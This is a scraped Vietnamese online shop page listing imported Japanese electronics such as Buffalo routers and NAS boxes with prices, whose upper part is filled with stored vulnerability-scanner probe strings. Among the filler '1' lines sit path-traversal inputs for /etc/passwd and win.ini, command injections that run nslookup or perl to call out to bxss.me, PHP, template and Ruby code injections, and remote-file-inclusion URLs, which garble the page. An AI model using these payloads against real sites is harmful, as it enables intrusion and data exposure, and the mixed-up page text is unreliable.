TRANG CHỦ HƯỚNG DẪN SỬ DỤNG DOWNLOAD DỊCH VỤ CHÉP PHIM HD DỊCH VỤ HỖ TRỢ CHUYỄN SANG PHIÊN BẢN WEBSITE MỚI
English
 
TRANG CHỦ
DANH MỤC SẢN PHẨM
 
TÌM KIẾM NÂNG CAO
 
 
 
 
HỖ TRỢ TRỰC TUYẾN
 
Hỗ Trợ Mua Hàng
 
 
Hỗ Trợ Website
 
 
1
 
 
1
  Sky: dwUQQUrL
 
1
 
 
1
 
 
1
 
 
1
 
 
1DptY634FxO
 
 
1
 
 
1
 
 
1
  Sky: dwUQQUrL
 
1
 
 
1
  Sky: dwUQQUrL
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
response.write(9904615*9005641)
 
 
'+response.write(9904615*9005641)+'
 
 
"+response.write(9904615*9005641)+"
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
KNBmoY9f
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
  ">&m=g&t=1" border="0" />
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
 
 
1
 
 
12345'"\'\");|]*{ <>
 
 
1
 
 
1
 
 
 
 
1
 
 
1
 
 
1
 
 
../../../../../../../../../../etc/passwd
 
 
1
 
 
1
  ">&m=g&t=1" border="0" />
 
1
 
 
1
 
 
../../../../../../../../../../windows/win.ini
 
 
1
 
 
1
 
 
1
 
 
../1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
${9999687+9999080}
 
 
1
 
 
1
 
 
echo bksuex$()\ xetnfk\nz^xyu||a #' &echo bksuex$()\ xetnfk\nz^xyu||a #|" &echo bksuex$()\ xetnfk\nz^xyu||a #
 
 
&echo fjfexx$()\ fdshlk\nz^xyu||a #' &echo fjfexx$()\ fdshlk\nz^xyu||a #|" &echo fjfexx$()\ fdshlk\nz^xyu||a #
 
 
|echo qwmsqe$()\ yytqmm\nz^xyu||a #' |echo qwmsqe$()\ yytqmm\nz^xyu||a #|" |echo qwmsqe$()\ yytqmm\nz^xyu||a #
 
 
(nslookup hitgttodzoamee115a.bxss.me||perl -e "gethostbyname('hitgttodzoamee115a.bxss.me')")
 
 
$(nslookup hiteznwjzepwf0b9a7.bxss.me||perl -e "gethostbyname('hiteznwjzepwf0b9a7.bxss.me')")
 
 
1
 
 
&(nslookup hitaqxqlssmoz7a4b7.bxss.me||perl -e "gethostbyname('hitaqxqlssmoz7a4b7.bxss.me')")&'\"`0&(nslookup hitaqxqlssmoz7a4b7.bxss.me||perl -e "gethostbyname('hitaqxqlssmoz7a4b7.bxss.me')")&`'
 
 
1
 
 
|(nslookup hitazafboadgb7dd3e.bxss.me||perl -e "gethostbyname('hitazafboadgb7dd3e.bxss.me')")
 
 
1
 
 
1
 
 
1
 
 
`(nslookup hitjfoxzeztql2a720.bxss.me||perl -e "gethostbyname('hitjfoxzeztql2a720.bxss.me')")`
 
 
1
 
 
1
 
 
;(nslookup hitzjzkpbkzvo252a3.bxss.me||perl -e "gethostbyname('hitzjzkpbkzvo252a3.bxss.me')")|(nslookup hitzjzkpbkzvo252a3.bxss.me||perl -e "gethostbyname('hitzjzkpbkzvo252a3.bxss.me')")&(nslookup hitzjzkpbkzvo252a3.bxss.me||perl -e "gethostbyname('h
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1&n998222=v905128
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
)
 
 
1
 
 
!(()&&!|*|*|
 
 
1
 
 
1
 
 
^(#$!@#$)(()))******
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
 
 
1
 
 
'"()
 
 
1
 
 
1
 
 
1
 
 
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
 
 
1
 
 
1some_inexistent_file_with_long_name.jpg
 
 
Http://bxss.me/t/fit.txt
 
 
'.gethostbyname(lc('hitkf'.'czzoajwi46e18.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(76).chr(122).chr(90).'
 
 
http://bxss.me/t/fit.txt?.jpg
 
 
".gethostbyname(lc("hital"."ewjtajyu73af1.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(66).chr(97).chr(79)."
 
 
bxss.me
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
HttP://bxss.me/t/xss.html?%00
 
 
1
 
 
1
 
 
bxss.me/t/xss.html?%00
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
"+"A".concat(70-3).concat(22*4).concat(120).concat(90).concat(116).concat(75)+(require"socket" Socket.gethostbyname("hithr"+"agxdstgf7f8ff.bxss.me.")[3].to_s)+"
 
 
1
 
 
1
 
 
1
 
 
'+'A'.concat(70-3).concat(22*4).concat(100).concat(76).concat(114).concat(68)+(require'socket' Socket.gethostbyname('hitil'+'xffowyyef7d62.bxss.me.')[3].to_s)+'
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
1
 
 
index.php
 
 
/xfs.bxss.me
 
 
1
 
 
1
 
 
index.php
 
 
1
 
 
index.php/.
 
 
1
 
 
1
 
 
1
 
 
;print(md5(31337));
 
 
1
 
 
1
 
 
';print(md5(31337));$a='
 
 
1
 
 
";print(md5(31337));$a="
 
 
${@print(md5(31337))}
 
 
'"
 
 
${@print(md5(31337))}\
 
 
200Gb
Giá : 800.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i12",[1,'
HUB 5 ports USB 2.0 Power đến từ chính hãng Buffalo
Giá : 200.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i13",[1,'
Ổ khóa MOUNTAIN Security Steel Padlock, lô hàng từ USA về VN
Giá : 150.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i14",[1,'
Sound Style của hãng tai nghe RASTA BANANA ST.EARPHONE. NTT DOCOMO
Giá : 150.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i15",[1,'
BOX 4 HDD LAN LS-QVL buffalo Nhật Bản
Giá : 2.600.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i16",[1,'
Tai Nghe Nhạc Japan dây rút độc lạ DOCOMO
Giá : 100.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i17",[1,'
Tai nghe (Headphone) nội địa Nhật Bản Docomo
Giá : 100.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i18",[1,'
Máy lọc nước, tạo độ PH theo ý đồ người dùng, khửi mùi, khử clo ...Kiềm ion hóa nước máy
Giá : Liên hệ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i19",[1,'
USB thu Wifi cho PC, Laptop, Hệ thống âm thanh Sony chính hãng
Giá : 200.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i20",[1,'
Sony WIRELESS Adaptor UWA-NA1: Thu Wifi cho hệ thống âm thanh Sony: NAS-S55HDE - NAS-SC500PK - NAS-SC55PKE - SS-S55HDE
Giá : 200.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i21",[1,'
Modem ADSL 2+ kết hợp Wifi chuẩn N, đến từ Buffalo Nhật Bản
Giá : 500.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i22",[1,'
Wifi Router Bufalo mang mã số: WZR-600DHP
Giá : 1.200.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i23",[1,'
Router Thu Phát Wifi Bufalo mang mã số: WHR-G301N V2, Wifi lên đến 300Mbps
Giá : 650.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i24",[1,'
Router Wifi Buffalo chuẩn N302, cổng LAN 1Gb
Giá : 1.100.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i25",[1,'
Router Wifi Buffalo chuẩn N, cổng LAN 1Gb WZR-300HP
Giá : 1.100.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i26",[1,'
Buffalo Wifi đến từ Japan mang mã số: WZR-HP-G450H tương thích Wifi chuẩn b,g,n, tốc độ wifi lên tối đa n450 Mbps
Giá : 1.200.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i27",[1,'
POE Cấp điện qua cổng LAN 1Gb( RJ45 ) của hãng Buffalo dùng trong nội địa Nhật mang mã số: BIJ-POE-4P/HG
Giá : 750.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i28",[1,'
Card IEEE 1394 Chuẩn b - PCIX gắn được cho PC, MAC bằng cổng PCI 32bit, 64 bit , 800Mbps
Giá : 250.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i29",[1,'
Card IEEE 1394 Chuẩn b - PCIX gắn được cho PC, MAC bằng cổng PCI 32bit, 64 bit , 800Mbps
Giá : 250.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i30",[1,'
Các loại Switch Ports 1Gb của hãng Buffalo:
Giá : 750.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i31",[1,'
Router Wifi chuẩn B, G, N của hãng BUFFALO mang mã số: WHR-HP-GN
Giá : 650.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i32",[1,'
Card SuperSpeed USB 3.0: tốc độ truyền tải cực nhanh - lên đến 5 Gbps
Giá : 250.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i33",[1,'
LS-VL LinkStation Pro hàng good nhất hiện nay của hãng BUFFALO
Giá : 900.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i34",[1,'
Router Wifi chuẩn B, G, N của hãng BUFFALO mang mã số: WHR-HP-G300N
Giá : 750.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i35",[1,'
Gậy Golf toàn hàng nội địa JAPAN Sản Xuất tại Nhật, Mỹ
Giá : 200.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i36",[1,'
LS-WVL LinkStation Pro Duo hàng good nhất hiện nay của hãng BUFFALO
Giá : 1.400.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i37",[1,'
Wifi Thu hoặc Phát: Web Caster W100 - DOCOMO NTT
Giá : 450.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i38",[1,'
Wifi Game Nintendo đến từ Japan dùng cho PC, Wii, Nintendo 3DS, DSi LL, DSi, DS Lite, DS và các thiết bị di động khác
Giá : 350.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i39",[1,'
Vợt TENNIS hàng nội địa JAPAN
Giá : 200.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i40",[1,'
Bán Khuyến mãi Wifi Router phát chuẩn N300, G54 hiệu BUFFALO WHR-G300N chỉ có 350.000VND cho các bạn có trong list Yahoo của dungcj, và thành viên trong buonbanonline.vn
Giá : 350.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i41",[1,'
BOX đựng HDD Buffalo SATA 3.5 inch
Giá : 150.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i42",[1,'
Máy Phát Điện YOKOHAMA, hàng New chưa sử dụng
Giá : 6.500.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i43",[1,'
Wifi Pro Buffalo WAPM-AG300N - WAPM-APG300N - WAPM-APG600H dòng Wifi chuyên nghiệp
Giá : 1.300.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i44",[1,'
LinkStation Live™ LS-CHL-V2. firmware 1.68
Giá : 500.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i45",[1,'
Đầu HD, Blu-ray, 3D... Chiếu Phim chất lượng cao cho Ti Vi, LCD, hàng Buffalo Japan
Giá : 900.000 VNĐ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_ai("i46",[1,'
Nồi Cơm điện Từ (nấu bằng sóng Điện Từ Cao tần)
Giá : Liên hệ
',"","_self","",0,0,"center"],["ItBgC","OtF","OtFC","OtFD","OvF","OvFC","OvFD"],"i0","i0"); sts_es();
 

SẢN PHẨM BÁN CHẠY
 

Giá : 1.000.000 VNĐ
Giá : 4.500.000 VNĐ
Giá : 7.000.000 VNĐ
Giá : 5.500.000 VNĐ
Giá : 2.200.000 VNĐ
Giá : 350.000 VNĐ
Giá : 1.600.000 VNĐ
Giá : 2.200.000 VNĐ
Giá : 2.800.000 VNĐ
Giá : Liên hệ
Giá : 800.000 VNĐ
Giá : 200.000 VNĐ
Giá : 150.000 VNĐ
Giá : 150.000 VNĐ
Giá : 2.600.000 VNĐ
Giá : 100.000 VNĐ
Giá : 100.000 VNĐ
Giá : Liên hệ
Giá : 200.000 VNĐ
Giá : 500.000 VNĐ
Giá : 1.200.000 VNĐ
Giá : 1.100.000 VNĐ
Giá : 1.200.000 VNĐ
Giá : 650.000 VNĐ
Giá : 750.000 VNĐ
Giá : 200.000 VNĐ
Giá : 450.000 VNĐ
Giá : 350.000 VNĐ
Giá : 200.000 VNĐ
Giá : 1.300.000 VNĐ
Giá : 500.000 VNĐ
Giá : 900.000 VNĐ
Giá : 6.500.000 VNĐ
Giá : 200.000 VNĐ
Giá : 1.400.000 VNĐ
Giá : 250.000 VNĐ
Giá : 900.000 VNĐ
Giá : Liên hệ
Giá : 250.000 VNĐ
Giá : 750.000 VNĐ
  
 
 

 
   HƯỚNG DẪN SỬ DỤNG   |   DOWNLOAD   |   DỊCH VỤ CHÉP PHIM HD   |   DỊCH VỤ HỖ TRỢ   
 
Lượt truy cập 789746  
Số người online 14